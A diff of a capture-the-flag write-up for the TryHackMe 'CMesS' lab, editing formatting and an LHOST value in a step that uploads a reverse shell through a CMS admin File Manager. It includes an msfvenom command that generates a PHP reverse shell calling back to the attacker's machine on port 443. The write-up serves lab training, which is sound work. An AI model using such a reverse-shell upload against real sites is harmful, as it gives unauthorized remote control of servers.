siunam321/CTF-Writeups/TryHackMe/CMesS/README.md

 # Initial Shell:

-Now we have control of the admin panel, we can now upload a reverse shell in `Content` -> `File Manager`
+Now we have control of the admin panel, we can now upload a reverse shell in `Content` -> `File Manager`.

 ![](https://github.com/siunam321/CTF-Writeups/blob/main/TryHackMe/CMesS/images/a4.png)

-First, generate a php reverse shell via msfvenom:
+First, generate a php reverse shell via `msfvenom`:

 ```
 ┌──(root💀nam)-[~/ctf/thm/ctf/CMesS]
-└─# msfvenom -p php/reverse_php LHOST=10.18.61.134 LPORT=443 -o shell.php
+└─# msfvenom -p php/reverse_php LHOST=tun0 LPORT=443 -o shell.php
 [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
 [-] No arch selected, selecting arch: php from the payload
 No encoder specified, outputting raw payload